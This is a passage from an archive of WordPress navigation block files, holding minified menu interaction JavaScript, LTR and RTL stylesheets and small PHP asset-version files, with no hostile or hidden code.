}navigation/view.min.js000060400000006344151330427370011005 0ustar00import*as e from"@wordpress/interactivity";var t={d:(e,n)=>{for(var o in n)t.o(n,o)&&!t.o(e,o)&&Object.defineProperty(e,o,{enumerable:!0,get:n[o]})},o:(e,t)=>Object.prototype.hasOwnProperty.call(e,t)};const n=(e=>{var n={};return t.d(n,e),n})({getContext:()=>e.getContext,getElement:()=>e.getElement,store:()=>e.store}),o=["a[href]",'input:not([disabled]):not([type="hidden"]):not([aria-hidden])',"select:not([disabled]):not([aria-hidden])","textarea:not([disabled]):not([aria-hidden])","button:not([disabled]):not([aria-hidden])","[contenteditable]",'[tabindex]:not([tabindex^="-"])'];document.addEventListener("click",(()=>{}));const{state:l,actions:c}=(0,n.store)("core/navigation",{state:{get roleAttribute(){return"overlay"===(0,n.getContext)().type&&l.isMenuOpen?"dialog":null},get ariaModal(){return"overlay"===(0,n.getContext)().type&&l.isMenuOpen?"true":null},get ariaLabel(){const e=(0,n.getContext)();return"overlay"===e.type&&l.isMenuOpen?e.ariaLabel:null},get isMenuOpen(){return Object.values(l.menuOpenedBy).filter(Boolean).length>0},get menuOpenedBy(){const e=(0,n.getContext)();return"overlay"===e.type?e.overlayOpenedBy:e.submenuOpenedBy}},actions:{openMenuOnHover(){const{type:e,overlayOpenedBy:t}=(0,n.getContext)();"submenu"===e&&0===Object.values(t||{}).filter(Boolean).length&&c.openMenu("hover")},closeMenuOnHover(){const{type:e,overlayOpenedBy:t}=(0,n.getContext)();"submenu"===e&&0===Object.values(t||{}).filter(Boolean).length&&c.closeMenu("hover")},openMenuOnClick(){const e=(0,n.getContext)(),{ref:t}=(0,n.getElement)();e.previousFocus=t,c.openMenu("click")},closeMenuOnClick(){c.closeMenu("click"),c.closeMenu("focus")},openMenuOnFocus(){c.openMenu("focus")},toggleMenuOnClick(){const e=(0,n.getContext)(),{ref:t}=(0,n.getElement)();window.document.activeElement!==t&&t.focus();const{menuOpenedBy:o}=l;o.click||o.focus?(c.closeMenu("click"),c.closeMenu("focus")):(e.previousFocus=t,c.openMenu("click"))},handleMenuKeydown(e){const{type:t,firstFocusableElement:o,lastFocusableElement:u}=(0,n.getContext)();if(l.menuOpenedBy.click){if("Escape"===e?.key)return c.closeMenu("click"),void c.closeMenu("focus");"overlay"===t&&"Tab"===e.key&&(e.shiftKey&&window.document.activeElement===o?(e.preventDefault(),u.focus()):e.shiftKey||window.document.activeElement!==u||(e.preventDefault(),o.focus()))}},handleMenuFocusout(e){const{modal:t,type:o}=(0,n.getContext)();(null===e.relatedTarget||!t?.contains(e.relatedTarget)&&e.target!==window.document.activeElement&&"submenu"===o)&&(c.closeMenu("click"),c.closeMenu("focus"))},openMenu(e="click"){const{type:t}=(0,n.getContext)();l.menuOpenedBy[e]=!0,"overlay"===t&&document.documentElement.classList.add("has-modal-open")},closeMenu(e="click"){const t=(0,n.getContext)();l.menuOpenedBy[e]=!1,l.isMenuOpen||(t.modal?.contains(window.document.activeElement)&&t.previousFocus?.focus(),t.modal=null,t.previousFocus=null,"overlay"===t.type&&document.documentElement.classList.remove("has-modal-open"))}},callbacks:{initMenu(){const e=(0,n.getContext)(),{ref:t}=(0,n.getElement)();if(l.isMenuOpen){const n=t.querySelectorAll(o);e.modal=t,e.firstFocusableElement=n[0],e.lastFocusableElement=n[n.length-1]}},focusFirstElement(){const{ref:e}=(0,n.getElement)();if(l.isMenuOpen){const t=e.querySelectorAll(o);t?.[0]?.focus()}}}},{lock:!0});navigation/style.css000060400000042177151330427370010571 0ustar00.wp-block-navigation{
  position:relative;
  --navigation-layout-justification-setting:flex-start;
  --navigation-layout-direction:row;
  --navigation-layout-wrap:wrap;
  --navigation-layout-justify:flex-start;
  --navigation-layout-align:center;
}
.wp-block-navigation ul{
  margin-bottom:0;
  margin-left:0;
  margin-top:0;
  padding-left:0;
}
.wp-block-navigation ul,.wp-block-navigation ul li{
  list-style:none;
  padding:0;
}
.wp-block-navigation .wp-block-navigation-item{
  align-items:center;
  background-color:inherit;
  display:flex;
  position:relative;
}
.wp-block-navigation .wp-block-navigation-item .wp-block-navigation__submenu-container:empty{
  display:none;
}
.wp-block-navigation .wp-block-navigation-item__content{
  display:block;
}
.wp-block-navigation .wp-block-navigation-item__content.wp-block-navigation-item__content{
  color:inherit;
}
.wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content,.wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content:active,.wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content:focus{
  text-decoration:underline;
}
.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content,.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content:active,.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content:focus{
  text-decoration:line-through;
}
.wp-block-navigation :where(a),.wp-block-navigation :where(a:active),.wp-block-navigation :where(a:focus){
  text-decoration:none;
}
.wp-block-navigation .wp-block-navigation__submenu-icon{
  align-self:center;
  background-color:inherit;
  border:none;
  color:currentColor;
  display:inline-block;
  font-size:inherit;
  height:.6em;
  line-height:0;
  margin-left:.25em;
  padding:0;
  width:.6em;
}
.wp-block-navigation .wp-block-navigation__submenu-icon svg{
  display:inline-block;
  stroke:currentColor;
  height:inherit;
  margin-top:.075em;
  width:inherit;
}
.wp-block-navigation.is-vertical{
  --navigation-layout-direction:column;
  --navigation-layout-justify:initial;
  --navigation-layout-align:flex-start;
}
.wp-block-navigation.no-wrap{
  --navigation-layout-wrap:nowrap;
}
.wp-block-navigation.items-justified-center{
  --navigation-layout-justification-setting:center;
  --navigation-layout-justify:center;
}
.wp-block-navigation.items-justified-center.is-vertical{
  --navigation-layout-align:center;
}
.wp-block-navigation.items-justified-right{
  --navigation-layout-justification-setting:flex-end;
  --navigation-layout-justify:flex-end;
}
.wp-block-navigation.items-justified-right.is-vertical{
  --navigation-layout-align:flex-end;
}
.wp-block-navigation.items-justified-space-between{
  --navigation-layout-justification-setting:space-between;
  --navigation-layout-justify:space-between;
}

.wp-block-navigation .has-child .wp-block-navigation__submenu-container{
  align-items:normal;
  background-color:inherit;
  color:inherit;
  display:flex;
  flex-direction:column;
  height:0;
  left:-1px;
  opacity:0;
  overflow:hidden;
  position:absolute;
  top:100%;
  transition:opacity .1s linear;
  visibility:hidden;
  width:0;
  z-index:2;
}
.wp-block-navigation .has-child .wp-block-navigation__submenu-container>.wp-block-navigation-item>.wp-block-navigation-item__content{
  display:flex;
  flex-grow:1;
}
.wp-block-navigation .has-child .wp-block-navigation__submenu-container>.wp-block-navigation-item>.wp-block-navigation-item__content .wp-block-navigation__submenu-icon{
  margin-left:auto;
  margin-right:0;
}
.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation-item__content{
  margin:0;
}
@media (min-width:782px){
  .wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{
    left:100%;
    top:-1px;
  }
  .wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before{
    background:#0000;
    content:"";
    display:block;
    height:100%;
    position:absolute;
    right:100%;
    width:.5em;
  }
  .wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-icon{
    margin-right:.25em;
  }
  .wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-icon svg{
    transform:rotate(-90deg);
  }
}
.wp-block-navigation .has-child .wp-block-navigation-submenu__toggle[aria-expanded=true]~.wp-block-navigation__submenu-container,.wp-block-navigation .has-child:not(.open-on-click):hover>.wp-block-navigation__submenu-container,.wp-block-navigation .has-child:not(.open-on-click):not(.open-on-hover-click):focus-within>.wp-block-navigation__submenu-container{
  height:auto;
  min-width:200px;
  opacity:1;
  overflow:visible;
  visibility:visible;
  width:auto;
}

.wp-block-navigation.has-background .has-child .wp-block-navigation__submenu-container{
  left:0;
  top:100%;
}
@media (min-width:782px){
  .wp-block-navigation.has-background .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{
    left:100%;
    top:0;
  }
}

.wp-block-navigation-submenu{
  display:flex;
  position:relative;
}
.wp-block-navigation-submenu .wp-block-navigation__submenu-icon svg{
  stroke:currentColor;
}

button.wp-block-navigation-item__content{
  background-color:initial;
  border:none;
  color:currentColor;
  font-family:inherit;
  font-size:inherit;
  font-style:inherit;
  font-weight:inherit;
  letter-spacing:inherit;
  line-height:inherit;
  text-align:left;
  text-transform:inherit;
}

.wp-block-navigation-submenu__toggle{
  cursor:pointer;
}

.wp-block-navigation-item.open-on-click .wp-block-navigation-submenu__toggle{
  padding-left:0;
  padding-right:.85em;
}
.wp-block-navigation-item.open-on-click .wp-block-navigation-submenu__toggle+.wp-block-navigation__submenu-icon{
  margin-left:-.6em;
  pointer-events:none;
}

.wp-block-navigation-item.open-on-click button.wp-block-navigation-item__content:not(.wp-block-navigation-submenu__toggle){
  padding:0;
}
.wp-block-navigation .wp-block-page-list,.wp-block-navigation__container,.wp-block-navigation__responsive-close,.wp-block-navigation__responsive-container,.wp-block-navigation__responsive-container-content,.wp-block-navigation__responsive-dialog{
  gap:inherit;
}
:where(.wp-block-navigation.has-background .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation.has-background .wp-block-navigation-submenu a:not(.wp-element-button)){
  padding:.5em 1em;
}

:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-submenu a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-submenu button.wp-block-navigation-item__content),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-pages-list__item button.wp-block-navigation-item__content){
  padding:.5em 1em;
}
.wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container{
  left:auto;
  right:0;
}
.wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{
  left:-1px;
  right:-1px;
}
@media (min-width:782px){
  .wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{
    left:auto;
    right:100%;
  }
}

.wp-block-navigation:not(.has-background) .wp-block-navigation__submenu-container{
  background-color:#fff;
  border:1px solid #00000026;
}

.wp-block-navigation.has-background .wp-block-navigation__submenu-container{
  background-color:inherit;
}

.wp-block-navigation:not(.has-text-color) .wp-block-navigation__submenu-container{
  color:#000;
}

.wp-block-navigation__container{
  align-items:var(--navigation-layout-align, initial);
  display:flex;
  flex-direction:var(--navigation-layout-direction, initial);
  flex-wrap:var(--navigation-layout-wrap, wrap);
  justify-content:var(--navigation-layout-justify, initial);
  list-style:none;
  margin:0;
  padding-left:0;
}
.wp-block-navigation__container .is-responsive{
  display:none;
}

.wp-block-navigation__container:only-child,.wp-block-page-list:only-child{
  flex-grow:1;
}
@keyframes overlay-menu__fade-in-animation{
  0%{
    opacity:0;
    transform:translateY(.5em);
  }
  to{
    opacity:1;
    transform:translateY(0);
  }
}
.wp-block-navigation__responsive-container{
  bottom:0;
  display:none;
  left:0;
  position:fixed;
  right:0;
  top:0;
}
.wp-block-navigation__responsive-container :where(.wp-block-navigation-item a){
  color:inherit;
}
.wp-block-navigation__responsive-container .wp-block-navigation__responsive-container-content{
  align-items:var(--navigation-layout-align, initial);
  display:flex;
  flex-direction:var(--navigation-layout-direction, initial);
  flex-wrap:var(--navigation-layout-wrap, wrap);
  justify-content:var(--navigation-layout-justify, initial);
}
.wp-block-navigation__responsive-container:not(.is-menu-open.is-menu-open){
  background-color:inherit !important;
  color:inherit !important;
}
.wp-block-navigation__responsive-container.is-menu-open{
  animation:overlay-menu__fade-in-animation .1s ease-out;
  animation-fill-mode:forwards;
  background-color:inherit;
  display:flex;
  flex-direction:column;
  overflow:auto;
  padding:clamp(1rem, var(--wp--style--root--padding-top), 20rem) clamp(1rem, var(--wp--style--root--padding-right), 20rem) clamp(1rem, var(--wp--style--root--padding-bottom), 20rem) clamp(1rem, var(--wp--style--root--padding-left), 20em);
  z-index:100000;
}
@media (prefers-reduced-motion:reduce){
  .wp-block-navigation__responsive-container.is-menu-open{
    animation-delay:0s;
    animation-duration:1ms;
  }
}
.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content{
  align-items:var(--navigation-layout-justification-setting, inherit);
  display:flex;
  flex-direction:column;
  flex-wrap:nowrap;
  overflow:visible;
  padding-top:calc(2rem + 24px);
}
.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-page-list{
  justify-content:flex-start;
}
.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-icon{
  display:none;
}
.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .has-child .wp-block-navigation__submenu-container{
  border:none;
  height:auto;
  min-width:200px;
  opacity:1;
  overflow:initial;
  padding-left:2rem;
  padding-right:2rem;
  position:static;
  visibility:visible;
  width:auto;
}
.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-container{
  gap:inherit;
}
.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-container{
  padding-top:var(--wp--style--block-gap, 2em);
}
.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation-item__content{
  padding:0;
}
.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation-item,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-page-list{
  align-items:var(--navigation-layout-justification-setting, initial);
  display:flex;
  flex-direction:column;
}
.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation-item,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation-item .wp-block-navigation__submenu-container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-page-list{
  background:#0000 !important;
  color:inherit !important;
}
.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container{
  left:auto;
  right:auto;
}
@media (min-width:600px){
  .wp-block-navigation__responsive-container:not(.hidden-by-default):not(.is-menu-open){
    background-color:inherit;
    display:block;
    position:relative;
    width:100%;
    z-index:auto;
  }
  .wp-block-navigation__responsive-container:not(.hidden-by-default):not(.is-menu-open) .wp-block-navigation__responsive-container-close{
    display:none;
  }
  .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container{
    left:0;
  }
}

.wp-block-navigation:not(.has-background) .wp-block-navigation__responsive-container.is-menu-open{
  background-color:#fff;
}

.wp-block-navigation:not(.has-text-color) .wp-block-navigation__responsive-container.is-menu-open{
  color:#000;
}

.wp-block-navigation__toggle_button_label{
  font-size:1rem;
  font-weight:700;
}

.wp-block-navigation__responsive-container-close,.wp-block-navigation__responsive-container-open{
  background:#0000;
  border:none;
  color:currentColor;
  cursor:pointer;
  margin:0;
  padding:0;
  text-transform:inherit;
  vertical-align:middle;
}
.wp-block-navigation__responsive-container-close svg,.wp-block-navigation__responsive-container-open svg{
  fill:currentColor;
  display:block;
  height:24px;
  pointer-events:none;
  width:24px;
}

.wp-block-navigation__responsive-container-open{
  display:flex;
}
.wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open{
  font-family:inherit;
  font-size:inherit;
  font-weight:inherit;
}
@media (min-width:600px){
  .wp-block-navigation__responsive-container-open:not(.always-shown){
    display:none;
  }
}

.wp-block-navigation__responsive-container-close{
  position:absolute;
  right:0;
  top:0;
  z-index:2;
}
.wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close{
  font-family:inherit;
  font-size:inherit;
  font-weight:inherit;
}

.wp-block-navigation__responsive-close{
  width:100%;
}
.has-modal-open .wp-block-navigation__responsive-close{
  margin-left:auto;
  margin-right:auto;
  max-width:var(--wp--style--global--wide-size, 100%);
}
.wp-block-navigation__responsive-close:focus{
  outline:none;
}

.is-menu-open .wp-block-navigation__responsive-close,.is-menu-open .wp-block-navigation__responsive-container-content,.is-menu-open .wp-block-navigation__responsive-dialog{
  box-sizing:border-box;
}

.wp-block-navigation__responsive-dialog{
  position:relative;
}

.has-modal-open .admin-bar .is-menu-open .wp-block-navigation__responsive-dialog{
  margin-top:46px;
}
@media (min-width:782px){
  .has-modal-open .admin-bar .is-menu-open .wp-block-navigation__responsive-dialog{
    margin-top:32px;
  }
}

html.has-modal-open{
  overflow:hidden;
}navigation/view.asset.php000060400000000124151330427370011502 0ustar00<?php return array('dependencies' => array(), 'version' => 'c7aadf427ad3311e0624');
navigation/view-modal.asset.php000060400000000124151330427370012574 0ustar00<?php return array('dependencies' => array(), 'version' => 'a145d0113e969f692877');
navigation/style-rtl.css000060400000042206151330427370011361 0ustar00.wp-block-navigation{
  position:relative;
  --navigation-layout-justification-setting:flex-start;
  --navigation-layout-direction:row;
  --navigation-layout-wrap:wrap;
  --navigation-layout-justify:flex-start;
  --navigation-layout-align:center;
}
.wp-block-navigation ul{
  margin-bottom:0;
  margin-right:0;
  margin-top:0;
  padding-right:0;
}
.wp-block-navigation ul,.wp-block-navigation ul li{
  list-style:none;
  padding:0;
}
.wp-block-navigation .wp-block-navigation-item{
  align-items:center;
  background-color:inherit;
  display:flex;
  position:relative;
}
.wp-block-navigation .wp-block-navigation-item .wp-block-navigation__submenu-container:empty{
  display:none;
}
.wp-block-navigation .wp-block-navigation-item__content{
  display:block;
}
.wp-block-navigation .wp-block-navigation-item__content.wp-block-navigation-item__content{
  color:inherit;
}
.wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content,.wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content:active,.wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content:focus{
  text-decoration:underline;
}
.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content,.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content:active,.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content:focus{
  text-decoration:line-through;
}
.wp-block-navigation :where(a),.wp-block-navigation :where(a:active),.wp-block-navigation :where(a:focus){
  text-decoration:none;
}
.wp-block-navigation .wp-block-navigation__submenu-icon{
  align-self:center;
  background-color:inherit;
  border:none;
  color:currentColor;
  display:inline-block;
  font-size:inherit;
  height:.6em;
  line-height:0;
  margin-right:.25em;
  padding:0;
  width:.6em;
}
.wp-block-navigation .wp-block-navigation__submenu-icon svg{
  display:inline-block;
  stroke:currentColor;
  height:inherit;
  margin-top:.075em;
  width:inherit;
}
.wp-block-navigation.is-vertical{
  --navigation-layout-direction:column;
  --navigation-layout-justify:initial;
  --navigation-layout-align:flex-start;
}
.wp-block-navigation.no-wrap{
  --navigation-layout-wrap:nowrap;
}
.wp-block-navigation.items-justified-center{
  --navigation-layout-justification-setting:center;
  --navigation-layout-justify:center;
}
.wp-block-navigation.items-justified-center.is-vertical{
  --navigation-layout-align:center;
}
.wp-block-navigation.items-justified-right{
  --navigation-layout-justification-setting:flex-end;
  --navigation-layout-justify:flex-end;
}
.wp-block-navigation.items-justified-right.is-vertical{
  --navigation-layout-align:flex-end;
}
.wp-block-navigation.items-justified-space-between{
  --navigation-layout-justification-setting:space-between;
  --navigation-layout-justify:space-between;
}

.wp-block-navigation .has-child .wp-block-navigation__submenu-container{
  align-items:normal;
  background-color:inherit;
  color:inherit;
  display:flex;
  flex-direction:column;
  height:0;
  opacity:0;
  overflow:hidden;
  position:absolute;
  right:-1px;
  top:100%;
  transition:opacity .1s linear;
  visibility:hidden;
  width:0;
  z-index:2;
}
.wp-block-navigation .has-child .wp-block-navigation__submenu-container>.wp-block-navigation-item>.wp-block-navigation-item__content{
  display:flex;
  flex-grow:1;
}
.wp-block-navigation .has-child .wp-block-navigation__submenu-container>.wp-block-navigation-item>.wp-block-navigation-item__content .wp-block-navigation__submenu-icon{
  margin-left:0;
  margin-right:auto;
}
.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation-item__content{
  margin:0;
}
@media (min-width:782px){
  .wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{
    right:100%;
    top:-1px;
  }
  .wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before{
    background:#0000;
    content:"";
    display:block;
    height:100%;
    left:100%;
    position:absolute;
    width:.5em;
  }
  .wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-icon{
    margin-left:.25em;
  }
  .wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-icon svg{
    transform:rotate(90deg);
  }
}
.wp-block-navigation .has-child .wp-block-navigation-submenu__toggle[aria-expanded=true]~.wp-block-navigation__submenu-container,.wp-block-navigation .has-child:not(.open-on-click):hover>.wp-block-navigation__submenu-container,.wp-block-navigation .has-child:not(.open-on-click):not(.open-on-hover-click):focus-within>.wp-block-navigation__submenu-container{
  height:auto;
  min-width:200px;
  opacity:1;
  overflow:visible;
  visibility:visible;
  width:auto;
}

.wp-block-navigation.has-background .has-child .wp-block-navigation__submenu-container{
  right:0;
  top:100%;
}
@media (min-width:782px){
  .wp-block-navigation.has-background .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{
    right:100%;
    top:0;
  }
}

.wp-block-navigation-submenu{
  display:flex;
  position:relative;
}
.wp-block-navigation-submenu .wp-block-navigation__submenu-icon svg{
  stroke:currentColor;
}

button.wp-block-navigation-item__content{
  background-color:initial;
  border:none;
  color:currentColor;
  font-family:inherit;
  font-size:inherit;
  font-style:inherit;
  font-weight:inherit;
  letter-spacing:inherit;
  line-height:inherit;
  text-align:right;
  text-transform:inherit;
}

.wp-block-navigation-submenu__toggle{
  cursor:pointer;
}

.wp-block-navigation-item.open-on-click .wp-block-navigation-submenu__toggle{
  padding-left:.85em;
  padding-right:0;
}
.wp-block-navigation-item.open-on-click .wp-block-navigation-submenu__toggle+.wp-block-navigation__submenu-icon{
  margin-right:-.6em;
  pointer-events:none;
}

.wp-block-navigation-item.open-on-click button.wp-block-navigation-item__content:not(.wp-block-navigation-submenu__toggle){
  padding:0;
}
.wp-block-navigation .wp-block-page-list,.wp-block-navigation__container,.wp-block-navigation__responsive-close,.wp-block-navigation__responsive-container,.wp-block-navigation__responsive-container-content,.wp-block-navigation__responsive-dialog{
  gap:inherit;
}
:where(.wp-block-navigation.has-background .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation.has-background .wp-block-navigation-submenu a:not(.wp-element-button)){
  padding:.5em 1em;
}

:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-submenu a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-submenu button.wp-block-navigation-item__content),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-pages-list__item button.wp-block-navigation-item__content){
  padding:.5em 1em;
}
.wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container{
  left:0;
  right:auto;
}
.wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{
  left:-1px;
  right:-1px;
}
@media (min-width:782px){
  .wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{
    left:100%;
    right:auto;
  }
}

.wp-block-navigation:not(.has-background) .wp-block-navigation__submenu-container{
  background-color:#fff;
  border:1px solid #00000026;
}

.wp-block-navigation.has-background .wp-block-navigation__submenu-container{
  background-color:inherit;
}

.wp-block-navigation:not(.has-text-color) .wp-block-navigation__submenu-container{
  color:#000;
}

.wp-block-navigation__container{
  align-items:var(--navigation-layout-align, initial);
  display:flex;
  flex-direction:var(--navigation-layout-direction, initial);
  flex-wrap:var(--navigation-layout-wrap, wrap);
  justify-content:var(--navigation-layout-justify, initial);
  list-style:none;
  margin:0;
  padding-right:0;
}
.wp-block-navigation__container .is-responsive{
  display:none;
}

.wp-block-navigation__container:only-child,.wp-block-page-list:only-child{
  flex-grow:1;
}
@keyframes overlay-menu__fade-in-animation{
  0%{
    opacity:0;
    transform:translateY(.5em);
  }
  to{
    opacity:1;
    transform:translateY(0);
  }
}
.wp-block-navigation__responsive-container{
  bottom:0;
  display:none;
  left:0;
  position:fixed;
  right:0;
  top:0;
}
.wp-block-navigation__responsive-container :where(.wp-block-navigation-item a){
  color:inherit;
}
.wp-block-navigation__responsive-container .wp-block-navigation__responsive-container-content{
  align-items:var(--navigation-layout-align, initial);
  display:flex;
  flex-direction:var(--navigation-layout-direction, initial);
  flex-wrap:var(--navigation-layout-wrap, wrap);
  justify-content:var(--navigation-layout-justify, initial);
}
.wp-block-navigation__responsive-container:not(.is-menu-open.is-menu-open){
  background-color:inherit !important;
  color:inherit !important;
}
.wp-block-navigation__responsive-container.is-menu-open{
  animation:overlay-menu__fade-in-animation .1s ease-out;
  animation-fill-mode:forwards;
  background-color:inherit;
  display:flex;
  flex-direction:column;
  overflow:auto;
  padding:clamp(1rem, var(--wp--style--root--padding-top), 20rem) clamp(1rem, var(--wp--style--root--padding-left), 20em) clamp(1rem, var(--wp--style--root--padding-bottom), 20rem) clamp(1rem, var(--wp--style--root--padding-right), 20rem);
  z-index:100000;
}
@media (prefers-reduced-motion:reduce){
  .wp-block-navigation__responsive-container.is-menu-open{
    animation-delay:0s;
    animation-duration:1ms;
  }
}
.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content{
  align-items:var(--navigation-layout-justification-setting, inherit);
  display:flex;
  flex-direction:column;
  flex-wrap:nowrap;
  overflow:visible;
  padding-top:calc(2rem + 24px);
}
.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-page-list{
  justify-content:flex-start;
}
.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-icon{
  display:none;
}
.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .has-child .wp-block-navigation__submenu-container{
  border:none;
  height:auto;
  min-width:200px;
  opacity:1;
  overflow:initial;
  padding-left:2rem;
  padding-right:2rem;
  position:static;
  visibility:visible;
  width:auto;
}
.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-container{
  gap:inherit;
}
